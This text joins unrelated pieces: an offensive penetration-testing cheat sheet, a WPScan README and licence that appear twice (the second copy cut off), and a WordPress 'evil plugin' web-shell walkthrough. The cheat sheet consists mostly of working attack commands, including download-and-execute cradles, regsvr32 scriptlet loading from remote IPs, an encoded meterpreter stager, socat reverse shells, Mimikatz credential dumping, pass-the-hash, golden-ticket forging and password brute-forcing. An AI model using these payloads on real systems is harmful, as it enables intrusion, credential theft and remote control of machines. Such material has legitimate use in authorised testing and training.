![powershellless1](https://user-images.githubusercontent.com/7115563/40374533-8da00e10-5de9-11e8-888e-3b1eaccb28b0.png) Encode Payload ![powershellless2](https://user-images.githubusercontent.com/7115563/40374540-908e0ca8-5de9-11e8-9002-5f03193b10a5.png) Include payload in xsl file ![powershellless3](https://user-images.githubusercontent.com/7115563/40374546-92dcda84-5de9-11e8-99c8-9066ae129644.png) <pre>wmic process get brief /format:"https://raw.githubusercontent.com/adon90/pentest_compilation/master/nops.xsl"</pre> ![powershellless4](https://user-images.githubusercontent.com/7115563/40375266-73770028-5deb-11e8-92da-952692727bec.png) <a name="lolbins"></a><h3>LOLBINS</h3> <b>SyncAppvPublishingServer</b> <pre>SyncAppvPublishingServer.exe "n;(New-Object Net.WebClient).DownloadString('http://192.168.48.129:8000/reverse.ps1') | IEX"</pre> ![lolbin1](https://user-images.githubusercontent.com/7115563/40776727-ee904d00-64cb-11e8-8921-407581b13edf.png) <b>rundll32</b> <pre>rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("regsvr32 /s /n /u /i:http://192.168.48.130:8080/bhRxgASz0.sct scrobj.dll")</pre> <a name="privesc"></a><h2> Privilege Escalation</h2> <a name="linux"></a><h3> Linux Privilege Escalation </h3> - sudo -l - Kernel Exploits - OS Exploits - Password reuse (mysql, .bash_history, 000-default.conf...) - Known binaries with suid flag and interactive (nmap) - Custom binaries with suid flag either using other binaries or with command execution - Writable files owned by root that get executed (cronjobs) - MySQL as root - Vulnerable services (chkrootkit, logrotate) - Writable /etc/passwd - Readable .bash_history - SSH private key - Listening ports on localhost - /etc/fstab - /etc/exports - /var/mail - Process as other user (root) executing something you have permissions to modify - SSH public key + Predictable PRNG - apt update hooking (Pre-Invoke) - Capabilities <a name="windows"></a><h3> Windows Privilege Escalation </h3> - Kernel Exploits - OS Exploits - Pass The Hash - Password reuse - DLL hijacking (Path) - Vulnerable services - Writable services binaries path - Unquoted services - Listening ports on localhost - Registry keys <a name="kernel"></a><h3> Kernel Exploits </h3> Linux: https://github.com/lucyoa/kernel-exploits Windows: https://github.com/abatchy17/WindowsExploits <a name="tunneling"></a><h2>Tunneling & Port Forwarding</h2> <a name="sshovertcp"></a><h3>SSH over HTTP (Squid)</h3> <b> socat </b> <pre>socat TCP-L:9999,fork,reuseaddr PROXY:192.168.1.41:127.0.0.1:22,proxyport=3128 ssh [email protected] -p 9999</pre> <b>proxytunnel </b> <pre>proxytunnel -p 192.168.1.41:3128 -d 127.0.0.1:22 -a 5555 ssh [email protected] -p 5555</pre> <b>proxychains </b> <pre>http 192.168.1.41 3128 proxychains ssh [email protected]</pre> ![proxychains](https://user-images.githubusercontent.com/7115563/33822522-1e15dbee-de58-11e7-9953-3da8ff684cfc.png) <b>corkscrew </b> <pre>ssh [email protected] -t /bin/sh</pre> ![cork](https://user-images.githubusercontent.com/7115563/33822672-b92a51f0-de58-11e7-9936-06056b7903b8.png) <a name="tcpoverhttp"></a><h3> TCP over HTTP </h3> For this technique, it is necessary to be able to upload a file to a webserver. <a name="regeorg"><b> 1. reGeorg </b> File upload to the server correct ![regeorge2](https://user-images.githubusercontent.com/7115563/33883424-028c9f0e-df3c-11e7-9559-b35667ae76db.png) Tunnel creation `python reGeorgSocksProxy.py -p 5555 -u "http://<ip>/admin/uploads/reGeorg.jsp"` Proxychains config ![regeorge1](https://user-images.githubusercontent.com/7115563/33883419-fcc15416-df3b-11e7-89a9-499ffc1de9cf.png) <pre> proxychains nmap -F -sT 127.0.0.1 proxychains mysql -u root -p -h 127.0.0.1 proxychains ssh localhost </pre> ![regeorge3](https://user-images.githubusercontent.com/7115563/33883422-017021fe-df3c-11e7-8f99-f02de5084c02.png) Reference: https://sensepost.com/discover/tools/reGeorg/ <a name="abptts"><b> 2. ABBTTS </b> Upload File ![abbtts5](https://user-images.githubusercontent.com/7115563/33883774-6d249ffa-df3d-11e7-9f3f-68bf1e70465f.png) Config proxychains and create the tunnel ```python abpttsclient.py -c tomcat_walkthrough/config.txt -u http://192.168.1.128/abptts.jsp -f 127.0.0.1:22222/127.0.0.1:22``` Usage ```ssh -p 22222 [email protected]``` ![abbtts7](https://user-images.githubusercontent.com/7115563/33883891-dc2f3c70-df3d-11e7-84e9-ebd9eab9ebee.png) Reference: https://github.com/nccgroup/ABPTTS <a name="httpredirectors"><h3>HTTP Redirectors</h3> <a name="socatred"><b> 1. socat </b> <pre>socat TCP4-LISTEN:80,fork TCP4:REMOTE-HOST-IP-ADDRESS:80</pre> ![socatt](https://user-images.githubusercontent.com/7115563/42031184-a8b3deee-7ad5-11e8-96ae-9b38bfe82df2.png) <a name="iptablesred"><b> 2. iptables </b> <pre>iptables -I INPUT -p tcp -m tcp --dport 80 -j ACCEPT iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination REMOTEADDR:80 iptables -t nat -A POSTROUTING -j MASQUERADE iptables -I FORWARD -j ACCEPT iptables -P FORWARD ACCEPT sysctl net.ipv4.ip_forward=1</pre> ![iptables](https://user-images.githubusercontent.com/7115563/41294963-97cc925c-6e59-11e8-8adf-8db85f6ffaf2.png) <a name="windowsocks"></a><h3> Windows Socks Proxy </h3> In this case this is going to be used to access Burp listening on a Windows NATed VM from other PCs in the same network as the Windows Host. From the Windows Host machine (IP: 192.168.1.206) <pre> Import-Module .\Invoke-SocksProxy.psm1 Invoke-SocksProxy -bindPort 1234 </pre> ![invokesocks](https://user-images.githubusercontent.com/7115563/49870467-b63bb480-fe13-11e8-807d-8422e5837b58.png) From other PC on the Windows Host machine network (IP: 192.168.1.69) Configure `proxychains.conf`: <pre> socks4 192.168.1.206 1234 </pre> <pre>proxychains socat TCP-LISTEN:8081,fork,reuseaddr TCP:192.168.48.158:8080</pre> This command ahead makes Burp (which is listening on the NATed machine) accessible from 192.168.1.69 on port 8081 Now, configure the Proxy in the browser: ![proxyconf](https://user-images.githubusercontent.com/7115563/49870450-aae88900-fe13-11e8-8c95-4208f20cd8ec.png) All the traffic is logged on the NATed machine Burp. Reference: https://github.com/p3nt4/Invoke-SocksProxy <a name="poor"></a><h3> Man's Poor VPN </h3> Traffic forward over SSH without needing to ```ssh -D <port>``` <pre>sshuttle -vr [email protected] 1X0.1X.0.0/16</pre> ![sshuttle](https://user-images.githubusercontent.com/7115563/42047219-02a13b70-7b00-11e8-9686-8bf2f44bee81.png) Proof: ![mantis2](https://user-images.githubusercontent.com/7115563/34785499-a0e7d838-f631-11e7-869f-d6fcdc1051e9.png) Reference: http://teohm.com/blog/using-sshuttle-in-daily-work/ <a name="windowsad"></a><h2> Windows AD Environment </h2> <a name="applocker"></a><h3> Bypass Applocker </h3> <b>1. rundll32</b> ```rundll32.exe PowerShdll.dll,main``` ![applocker](https://user-images.githubusercontent.com/7115563/34455568-dfe7d7c6-ed81-11e7-9869-de2d4e92f3aa.png) Reference: https://github.com/p3nt4/PowerShdll <b>2. Alternative powershell files</b> ![applocker2](https://user-images.githubusercontent.com/7115563/34455569-e0136c6a-ed81-11e7-9b0e-127ae9d395e0.png) ```C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise``` <a name="pth"></a> <h3> Pass The Hash </h3> <b> Invoke a command Remotely </b> <pre>IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Kevin-Robertson/Invoke-TheHash/master/Invoke-WMIExec.ps1') Invoke-WMIExec -Target SVHOST2 -Username Administrator -Hash 78560bbcf70110fbfb5add17b5dfd762 -Command "powershell whoami | out-file \\SVHOST2\C$\windows\bitch.txt" </pre> <b> Invoke Mimikatz Remotely </b> <pre>Invoke-WMIExec -Target SVHOST2 -Username Administrator -Hash 78560bbcf70110fbfb5add17b5dfd762 -Command "powershell -Enc SQBFA...AoA"</pre> ![image](https://user-images.githubusercontent.com/7115563/34455757-1f6aed1c-ed86-11e7-9415-595fa5e8d6e7.png) <b> Pass The Hash with Mimikatz </b> <pre> Invoke-Mimikatz -Command '"sekurlsa::pth /user:adm_maint /ntlm:cbe55f143fcb6d4687583af520123b89 /domain:lazuli"'</pre> <a name="krb"></a><h3> Kerberos </h3> <b> Generate Golden Ticket (Domain Admin Required) </b> <pre>Invoke-Mimikatz -Command '"lsadump::dcsync /domain:LAZULI.CORP /user:krbtgt"'</pre> ![image](https://user-images.githubusercontent.com/7115563/34455725-7230ee30-ed85-11e7-9333-16372355ce60.png) ![image](https://user-images.githubusercontent.com/7115563/34455734-89934d5c-ed85-11e7-960e-9659e099c9df.png) <pre>Invoke-Mimikatz -Command '"kerberos::golden /user:adon /domain:LAZULI.CORP /krbtgt:ca1c2aeda9160094be9971bdc21c50aa /sid:S-1-5-21-1238634245-2147606590-2801756923 /id:500 /ticket:admin.kirbi /ptt"</pre> ![image](https://user-images.githubusercontent.com/7115563/34455745-9edd0360-ed85-11e7-84f0-6d62e621613b.png) <pre>Invoke-Mimikatz -Command '"kerberos::ptt admin.kirbi"'</pre> ![image](https://user-images.githubusercontent.com/7115563/34455747-b285372a-ed85-11e7-9374-c481108db77e.png) ![image](https://user-images.githubusercontent.com/7115563/34455748-bb0512c6-ed85-11e7-8d40-b6516cf8b0f3.png) <a name="miscwin"></a><h3> Miscellaneous </h3> <b> Invoke Mimikatz </b> <pre>IEX (New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1');Invoke-Mimikatz</pre> <b> Mimikatz C# </b> <pre>C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /r:System.IO.Compression.dll /unsafe katz.cs</pre> https://gist.github.com/caseysmithrc/87f6572547f633f13a8482a0c91fb7b7 In case compiler is outdated: <pre>nuget install Microsoft.Net.Compilers</pre> <b> Runas Powershell </b> ```Start-Process powershell.exe -Verb runas``` ```Start-Process powershell.exe -Credential <user>``` <b> View Shares With Permissions </b> <pre>powershell.exe -exec bypass -Command "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1');Invoke-ShareFinder -CheckShareAccess"</pre> ![image](https://user-images.githubusercontent.com/7115563/34455620-34f292b4-ed83-11e7-92b0-3b8dd387146f.png) <b> View files that contain certain words recursively </b> <pre> ls -Path \\SVHOST1.LAZULI.CORP\tmp$ -Include "*pass*","* admin*","*secret*" -Recurse -ErrorAction SilentlyContinue</pre> ![image](https://user-images.githubusercontent.com/7115563/34455641-aa03adf4-ed83-11e7-8333-a69366714921.png) <b> View files which name contains certain words recursively </b> <pre>dir -Path \\SVHOST1.LAZULI.CORP -Include "*pass*","*admin*","*secret*" -Recurse -ErrorAction SilentlyContinue</pre> ![image](https://user-images.githubusercontent.com/7115563/34455649-dcc941ea-ed83-11e7-9428-a702f254e807.png) <b> Connect to MSSQL Database </b> <pre>IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/michaellwest/PowerShell-Modules/master/CorpApps/Invoke-SqlCommand.ps1') Invoke-SqlCommand -Server 172.11.14.89 -Database master -Username sa -Password <password> -Query "exec sp_databases" </pre> <b> Port Scanning </b> <pre>IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/Invoke-Portscan.ps1') Invoke-Portscan -Hosts [ip] -TopPorts 50</pre> ![image](https://user-images.githubusercontent.com/7115563/34455679-6e630230-ed84-11e7-995e-2eea1a6fc8dc.png) <b> View Domain Admins </b> <pre> net groups /domain "Domain Admins"</pre> ![image](https://user-images.githubusercontent.com/7115563/34455690-9e648d78-ed84-11e7-9a84-9b335530a31e.png) <b> View Domain Controlers </b> <pre>nltest /dclist:<domain> </pre> ![image](https://user-images.githubusercontent.com/7115563/34455698-d1504074-ed84-11e7-85ad-c4bb196c9d44.png) <b> Get Hashes </b> <pre>IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/master/Gather/Get-PassHashes.ps1');Get-PassHashes</pre> ![image](https://user-images.githubusercontent.com/7115563/34455769-66cb31bc-ed86-11e7-846e-090647d8e32f.png) <b> Check Pass The Hash with multiple servers</b> <pre>$hosts = @("SVDC1.LAZULI.CORP","SVFILES.LAZULI.CORP","SVHOST1.LAZULI.CORP","SVHOST2.LAZULI.CORP","SVFILES2.LAZULI.CORP") foreach ($h in $hosts){ Invoke-WMIExec -Target $h -Username Administrator -Hash 78560bbcf70110fbfb5add17b5dfd762 -Command "hostname" -Verbose } </pre> ![image](https://user-images.githubusercontent.com/7115563/34455798-0bdc77ec-ed87-11e7-9504-6b9ec6fc2a8d.png) <b> Run web_delivery with other identity </b> <pre> runas-cabesha-webdelivery -url [url_webdelivery] -user [url] -pass [pass] </pre> ![cabesha](https://user-images.githubusercontent.com/7115563/42811084-e286eb5a-89b9-11e8-8ec8-b0b8c3980774.jpg) References: https://www.hacklikeapornstar.com/ <a name="revshells"></a><h2> Reverse Shells </h2> <a name="dns"></a><h3> Reverse DNS Shell with dnscat powershell </h3> <b> Server </b> <pre>ruby dnscat2.rb -e open --no-cache tunnel.domain.com</pre> <b> Client </b> <pre>IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/lukebaggett/dnscat2-powershell/master/dnscat2.ps1'); Start-Dnscat2 -Domain tunnel.domain.com -DNSServer 8.8.4.4 </pre> ![dns](https://user-images.githubusercontent.com/7115563/35040679-5a155bfa-fb82-11e7-98ec-ba015e3ad69c.png) Reference: https://github.com/lukebaggett/dnscat2-powershell <a name="icmp"></a><h3> Reverse ICMP shell </h3> <b> Server </b> <pre> python icmpsh_m.py [IP atacante] [IP victima] </pre> <b> Client </b> <pre>IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellIcmp.ps1'); Invoke-PowerShellIcmp -IPAddress [IP atacante]</pre> ![icmpreverseshell](https://user-images.githubusercontent.com/7115563/35213289-6ac51b00-ff5d-11e7-9b66-766af2aaf92e.png) Reference: https://esgeeks.com/icmpsh-shell-reverse-con-icmp/ <a name="httpproxy"></a><h3> Reverse HTTP Shell through Proxy </h3> <pre>use payload/python/meterpreter/reverse_http</pre> ![proxy2](https://user-images.githubusercontent.com/7115563/33836652-3d9c9624-de8a-11e7-9869-e18c5a28ebd7.png) ```python -c "import base64,sys;exec(base64.b64decode({2:str,3:lambda b:bytes(b,'UTF-8')}[sys.version_info[0]]('aW1wb3J0IHN5cwp2aT1zeXMudmVyc2lvbl9pbmZvCnVsPV9faW1wb3J0X18oezI6J3VybGxpYjInLDM6J3VybGxpYi5yZXF1ZXN0J31bdmlbMF1dLGZyb21saXN0PVsnYnVpbGRfb3BlbmVyJywnUHJveHlIYW5kbGVyJ10pCmhzPVtdCmhzLmFwcGVuZCh1bC5Qcm94eUhhbmRsZXIoeydodHRwJzonaHR0cDovLzE5Mi4xNjguMTA3LjIzMjo4MDgwJ30pKQpvPXVsLmJ1aWxkX29wZW5lcigqaHMpCm8uYWRkaGVhZGVycz1bKCdVc2VyLUFnZW50JywnTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgNi4xOyBUcmlkZW50LzcuMDsgcnY6MTEuMCkgbGlrZSBHZWNrbycpXQpleGVjKG8ub3BlbignaHR0cDovLzE3OC42Mi41OC4zNTo4MC9qOTkzQScpLnJlYWQoKSkK')))"``` Finally we set up the handler: ![proxy3](https://user-images.githubusercontent.com/7115563/33836552-fd3204ac-de89-11e7-940c-71c8ab321bf7.png) <a name="misc"></a><h2> Miscellaneous </h2> <a name="interactiveshell"></a><h3> Interactive Reverse Shell </h3> <b> Method 1 </b> Attacker: ```socat file:`tty`,raw,echo=0 TCP-L:4444``` Victim: ```wget -q http://10.10.14.16/socat -O /tmp/socat; chmod +x /tmp/socat; /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.10.14.16:4444``` Socat Binary: https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat <b> Method 2 </b> In reverse shell <pre> python -c 'import pty; pty.spawn("/bin/bash")' Ctrl-Z </pre> In kali <pre> echo $TERM stty -a stty raw -echo fg </pre> In reverse shell <pre> reset export SHELL=bash export TERM=xterm-256color stty rows <num> columns <cols> bash </pre> <a name="jailescape"></a><h3>rbash Jail Escape</h3> <b>RequestTTY no</b> <pre>ssh -o RequestTTY=no user@ip</pre> ![ttyno](https://user-images.githubusercontent.com/7115563/45673768-dec15480-bb2b-11e8-9d50-513c925b359b.png) and the result would be: ![ttyfalse2](https://user-images.githubusercontent.com/7115563/45673773-e254db80-bb2b-11e8-911a-f0dec70936f4.png) <b>Bash --noprofile</b> <pre>ssh [email protected] -t "bash --noprofile" </pre> ![bashnoprofile](https://user-images.githubusercontent.com/7115563/45673871-1defa580-bb2c-11e8-8004-c924ad0ddb56.png) <a name="windowstransfer"></a><h3> Windows File Transfer </h3> <b>bitsadmin</b> `bitsadmin /transfer debjob /download /priority normal http://<ip>/shell.php c:\xampp\htdocs\shell.php` <b>cscript wget.vbs (code on the repo)</b> `cscript wget.vbs http://<ip>/test.txt test.txt` <b>powershell</b> `powershell -c "(new-object System.Net.WebClient).Downloadfile('http://<ip>/exploit.exe', 'C:\Windows\temp\exploit.txt')"` <b>ftp</b> client: <pre> echo open [ip] [port] > ftpscript.txt echo anonymous>> ftpscript.txt echo PASS >> ftpscript.txt echo bin >> ftpscript.txt echo get meter.exe>> ftpscript.txt echo quit >> ftpscript.txt ftp -s:ftpscript.txt </pre> server: <code>python -m pyftpdlib --port=2121 --write</code> <b>wget.exe</b> Upload to vulnerable server from kali: ` /usr/share/windows-binaries/wget.exe` `wget.exe http://<ip>/file file` <b> certutil </b> `certutil -urlcache -split -f https://<ip>/file.txt file.txt` <a name="vpnrestrict"></a><h3> Bypass VPN routing restrictions </h3> <pre>openconnect vpnXXX02.XXXX.com -u XX -s ‘vpn-slice XXX.46.0.0/16 hostname3 mantis=XXX.41.2XX.68’</pre> ![vpn1](https://user-images.githubusercontent.com/7115563/41146909-30e484de-6b05-11e8-82fb-acfc17a722a2.png) Reference: https://github.com/dlenski/vpn-slice <a name="avbypass"></a><h3>AV Bypass</h3> <b> SharpSploit </b> <pre> Start-Process "powershell" "unblock-file .\SharpSploit.dll" Add-Type -Path .\SharpSploit.dll [SharpSploit.Execution.Shell]::ShellExecute("regsvr32 /s /n /u /i:http://192.168.48.151:9999/QuHBoZ.sct scrobj.dll") </pre> ![sharpsploit](https://user-images.githubusercontent.com/7115563/46204073-2c07a800-c31c-11e8-9905-76c168432018.png) References: https://cobbr.io/SharpSploit.html <b> Workflow.Compiler </b> <pre> C:\Windows\Microsoft.Net\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe test.xml results.xml </pre> ![workflow](https://user-images.githubusercontent.com/7115563/46660701-e79bc800-cbb7-11e8-8e07-49615b17d258.png) References: https://www.codeproject.com/Articles/25983/How-to-Execute-a-Command-in-C https://posts.specterops.io/arbitrary-unsigned-code-execution-vector-in-microsoft-workflow-compiler-exe-3d9294bc5efb
Wordpress =========== We don't know for sure if we will have a Wordpress box in the game, but just in case, we may as well try and be prepared. wpscan --------- * [https://wpscan.org/](https://wpscan.org/) * [https://github.com/wpscanteam/wpscan](https://github.com/wpscanteam/wpscan) Scan for all plugins and output to `wpscan.log` ``` wpscan --url http://192.168.1.10/wp -e ap --log wpscan.log ``` --------
<p align="center"> <a href="https://wpscan.com/"> <img src="https://raw.githubusercontent.com/wpscanteam/wpscan/gh-pages/images/wpscan_logo.png" alt="WPScan logo"> </a> </p> <h3 align="center">WPScan</h3> <p align="center"> WordPress Security Scanner <br> <br> <a href="https://wpscan.com/" title="homepage" target="_blank">WPScan WordPress Vulnerability Database</a> - <a href="https://wordpress.org/plugins/wpscan/" title="wordpress security plugin" target="_blank">WordPress Security Plugin</a> </p> <p align="center"> <a href="https://badge.fury.io/rb/wpscan" target="_blank"><img src="https://badge.fury.io/rb/wpscan.svg"></a> <a href="https://hub.docker.com/r/wpscanteam/wpscan/" target="_blank"><img src="https://img.shields.io/docker/pulls/wpscanteam/wpscan.svg"></a> <a href="https://github.com/wpscanteam/wpscan/actions?query=workflow%3ABuild" target="_blank"><img src="https://github.com/wpscanteam/wpscan/workflows/Build/badge.svg"></a> <a href="https://codeclimate.com/github/wpscanteam/wpscan" target="_blank"><img src="https://codeclimate.com/github/wpscanteam/wpscan/badges/gpa.svg"></a> </p> # INSTALL ## Prerequisites - (Optional but highly recommended: [RVM](https://rvm.io/rvm/install)) - Ruby >= 2.5 - Recommended: latest - Ruby 2.5.0 to 2.5.3 can cause an 'undefined symbol: rmpd_util_str_to_d' error in some systems, see [#1283](https://github.com/wpscanteam/wpscan/issues/1283) - Curl >= 7.72 - Recommended: latest - The 7.29 has a segfault - The < 7.72 could result in `Stream error in the HTTP/2 framing layer` in some cases - RubyGems - Recommended: latest - Nokogiri might require packages to be installed via your package manager depending on your OS, see https://nokogiri.org/tutorials/installing_nokogiri.html ### In a Pentesting distribution When using a pentesting distubution (such as Kali Linux), it is recommended to install/update wpscan via the package manager if available. ### In macOSX via Homebrew `brew install wpscanteam/tap/wpscan` ### From RubyGems ```shell gem install wpscan ``` On MacOSX, if a ```Gem::FilePermissionError``` is raised due to the Apple's System Integrity Protection (SIP), either install RVM and install wpscan again, or run ```sudo gem install -n /usr/local/bin wpscan``` (see [#1286](https://github.com/wpscanteam/wpscan/issues/1286)) # Updating You can update the local database by using ```wpscan --update``` Updating WPScan itself is either done via ```gem update wpscan``` or the packages manager (this is quite important for distributions such as in Kali Linux: ```apt-get update && apt-get upgrade```) depending on how WPScan was (pre)installed # Docker Pull the repo with ```docker pull wpscanteam/wpscan``` Enumerating usernames ```shell docker run -it --rm wpscanteam/wpscan --url https://target.tld/ --enumerate u ``` Enumerating a range of usernames ```shell docker run -it --rm wpscanteam/wpscan --url https://target.tld/ --enumerate u1-100 ``` ** replace u1-100 with a range of your choice. # Usage Full user documentation can be found here; https://github.com/wpscanteam/wpscan/wiki/WPScan-User-Documentation ```wpscan --url blog.tld``` This will scan the blog using default options with a good compromise between speed and accuracy. For example, the plugins will be checked passively but their version with a mixed detection mode (passively + aggressively). Potential config backup files will also be checked, along with other interesting findings. If a more stealthy approach is required, then ```wpscan --stealthy --url blog.tld``` can be used. As a result, when using the ```--enumerate``` option, don't forget to set the ```--plugins-detection``` accordingly, as its default is 'passive'. For more options, open a terminal and type ```wpscan --help``` (if you built wpscan from the source, you should type the command outside of the git repo) The DB is located at ~/.wpscan/db ## Optional: WordPress Vulnerability Database API The WPScan CLI tool uses the [WordPress Vulnerability Database API](https://wpscan.com/api) to retrieve WordPress vulnerability data in real time. For WPScan to retrieve the vulnerability data an API token must be supplied via the `--api-token` option, or via a configuration file, as discussed below. An API token can be obtained by registering an account on [WPScan.com](https://wpscan.com/register). Up to 25 API requests per day are given free of charge, that should be suitable to scan most WordPress websites at least once per day. When the daily 25 API requests are exhausted, WPScan will continue to work as normal but without any vulnerability data. Users can upgrade to paid API usage to increase their API limits within their user profile on [WPScan.com](https://wpscan.com/). #### The Free plan allows 25 API requests per day. View the different [available API plans](https://wpscan.com/api). ### How many API requests do you need? - Our WordPress scanner makes one API request for the WordPress version, one request per installed plugin and one request per installed theme. - On average, a WordPress website has 22 installed plugins. - The Free plan should cover around 50% of all WordPress websites. ## Load CLI options from file/s WPScan can load all options (including the --url) from configuration files, the following locations are checked (order: first to last): - ~/.wpscan/scan.json - ~/.wpscan/scan.yml - pwd/.wpscan/scan.json - pwd/.wpscan/scan.yml If those files exist, options from the `cli_options` key will be loaded and overridden if found twice. e.g: ~/.wpscan/scan.yml: ```yml cli_options: proxy: 'http://127.0.0.1:8080' verbose: true ``` pwd/.wpscan/scan.yml: ```yml cli_options: proxy: 'socks5://127.0.0.1:9090' url: 'http://target.tld' ``` Running ```wpscan``` in the current directory (pwd), is the same as ```wpscan -v --proxy socks5://127.0.0.1:9090 --url http://target.tld``` ## Save API Token in a file The feature mentioned above is useful to keep the API Token in a config file and not have to supply it via the CLI each time. To do so, create the ~/.wpscan/scan.yml file containing the below: ```yml cli_options: api_token: YOUR_API_TOKEN ``` ## Load API Token From ENV (since v3.7.10) The API Token will be automatically loaded from the ENV variable `WPSCAN_API_TOKEN` if present. If the `--api-token` CLI option is also provided, the value from the CLI will be used. ## Enumerating usernames ```shell wpscan --url https://target.tld/ --enumerate u ``` Enumerating a range of usernames ```shell wpscan --url https://target.tld/ --enumerate u1-100 ``` ** replace u1-100 with a range of your choice. # LICENSE ## WPScan Public Source License The WPScan software (henceforth referred to simply as "WPScan") is dual-licensed - Copyright 2011-2019 WPScan Team. Cases that include commercialization of WPScan require a commercial, non-free license. Otherwise, WPScan can be used without charge under the terms set out below. ### 1. Definitions 1.1 "License" means this document. 1.2 "Contributor" means each individual or legal entity that creates, contributes to the creation of, or owns WPScan. 1.3 "WPScan Team" means WPScan’s core developers. ### 2. Commercialization A commercial use is one intended for commercial advantage or monetary compensation. Example cases of commercialization are: - Using WPScan to provide commercial managed/Software-as-a-Service services. - Distributing WPScan as a commercial product or as part of one. - Using WPScan as a value added service/product. Example cases which do not require a commercial license, and thus fall under the terms set out below, include (but are not limited to): - Penetration testers (or penetration testing organizations) using WPScan as part of their assessment toolkit. - Penetration Testing Linux Distributions including but not limited to Kali Linux, SamuraiWTF, BackBox Linux. - Using WPScan to test your own systems. - Any non-commercial use of WPScan. If you need to purchase a commercial license or are unsure whether you need to purchase a commercial license contact us - [email protected]. Free-use Terms and Conditions; ### 3. Redistribution Redistribution is permitted under the following conditions: - Unmodified License is provided with WPScan. - Unmodified Copyright notices are provided with WPScan. - Does not conflict with the commercialization clause. ### 4. Copying Copying is permitted so long as it does not conflict with the Redistribution clause. ### 5. Modification Modification is permitted so long as it does not conflict with the Redistribution clause. ### 6. Contributions Any Contributions assume the Contributor grants the WPScan Team the unlimited, non-exclusive right to reuse, modify and relicense the Contributor's content. ### 7. Support WPScan is provided under an AS-IS basis and without any support, updates or maintenance. Support, updates and maintenance may be given according to the sole discretion of the WPScan Team. ### 8. Disclaimer of Warranty WPScan is provided under this License on an “as is” basis, without warranty of any kind, either expressed, implied, or statutory, including, without limitation, warranties that the WPScan is free of defects, merchantable, fit for a particular purpose or non-infringing. ### 9. Limitation of Liability To the extent permitted under Law, WPScan is provided under an AS-IS basis. The WPScan Team shall never, and without any limit, be liable for any damage, cost, expense or any other payment incurred as a result of WPScan's actions, failure, bugs and/or any other interaction between WPScan and end-equipment, computers, other software or any 3rd party, end-equipment, computer or services. ### 10. Disclaimer Running WPScan against websites without prior mutual consent may be illegal in your country. The WPScan Team accept no liability and are not responsible for any misuse or damage caused by WPScan. ### 11. Trademark The "wpscan" term is a registered trademark. This License does not grant the use of the "wpscan" trademark or the use of the WPScan logo.
# Wordpress ## Evil plugin install If you are wordpress admin. ( Upload wordpress-shell plugin that can be found under shells ) This location: --> Plugins --> Installed Plugins --> Add new --> upload ( Press Activate ) This command gives you now command execution ```sh curl http://10.11.1.xxx/wp-content/plugins/shell/shell.php?cmd=id ``` Use shellupgrader.py to get a full PTY shell. ```sh shellupgrader.py 'http://10.11.1.xxx/wp-content/plugins/shell/shell.php' 10.11.0.xxx 1337 [+] LHOST = 10.11.0.xxx [+] LPORT = 1337 [+] Shell listen www-data@hostname:/var/www/wp-content/plugins/shell$ id uid=33(www-data) gid=33(www-data) groups=33(www-data) ``` ## Reconnaissance Enumerate users ```sh wpscan --url 'http://10.11.1.234' --enumerate u ``` Bruteforce user account ```sh wpscan --url 'http://10.11.1.xxx' --wordlist /usr/share/wordlists/SecLists/Passwords/Leaked-Databases/rockyou.txt --username admin ```
<p align="center"> <a href="https://wpscan.com/"> <img src="https://raw.githubusercontent.com/wpscanteam/wpscan/gh-pages/images/wpscan_logo.png" alt="WPScan logo"> </a> </p> <h3 align="center">WPScan</h3> <p align="center"> WordPress Security Scanner <br> <br> <a href="https://wpscan.com/" title="homepage" target="_blank">WPScan WordPress Vulnerability Database</a> - <a href="https://wordpress.org/plugins/wpscan/" title="wordpress security plugin" target="_blank">WordPress Security Plugin</a> </p> <p align="center"> <a href="https://badge.fury.io/rb/wpscan" target="_blank"><img src="https://badge.fury.io/rb/wpscan.svg"></a> <a href="https://hub.docker.com/r/wpscanteam/wpscan/" target="_blank"><img src="https://img.shields.io/docker/pulls/wpscanteam/wpscan.svg"></a> <a href="https://github.com/wpscanteam/wpscan/actions?query=workflow%3ABuild" target="_blank"><img src="https://github.com/wpscanteam/wpscan/workflows/Build/badge.svg"></a> <a href="https://codeclimate.com/github/wpscanteam/wpscan" target="_blank"><img src="https://codeclimate.com/github/wpscanteam/wpscan/badges/gpa.svg"></a> </p> # INSTALL ## Prerequisites - (Optional but highly recommended: [RVM](https://rvm.io/rvm/install)) - Ruby >= 2.5 - Recommended: latest - Ruby 2.5.0 to 2.5.3 can cause an 'undefined symbol: rmpd_util_str_to_d' error in some systems, see [#1283](https://github.com/wpscanteam/wpscan/issues/1283) - Curl >= 7.72 - Recommended: latest - The 7.29 has a segfault - The < 7.72 could result in `Stream error in the HTTP/2 framing layer` in some cases - RubyGems - Recommended: latest - Nokogiri might require packages to be installed via your package manager depending on your OS, see https://nokogiri.org/tutorials/installing_nokogiri.html ### In a Pentesting distribution When using a pentesting distubution (such as Kali Linux), it is recommended to install/update wpscan via the package manager if available. ### In macOSX via Homebrew `brew install wpscanteam/tap/wpscan` ### From RubyGems ```shell gem install wpscan ``` On MacOSX, if a ```Gem::FilePermissionError``` is raised due to the Apple's System Integrity Protection (SIP), either install RVM and install wpscan again, or run ```sudo gem install -n /usr/local/bin wpscan``` (see [#1286](https://github.com/wpscanteam/wpscan/issues/1286)) # Updating You can update the local database by using 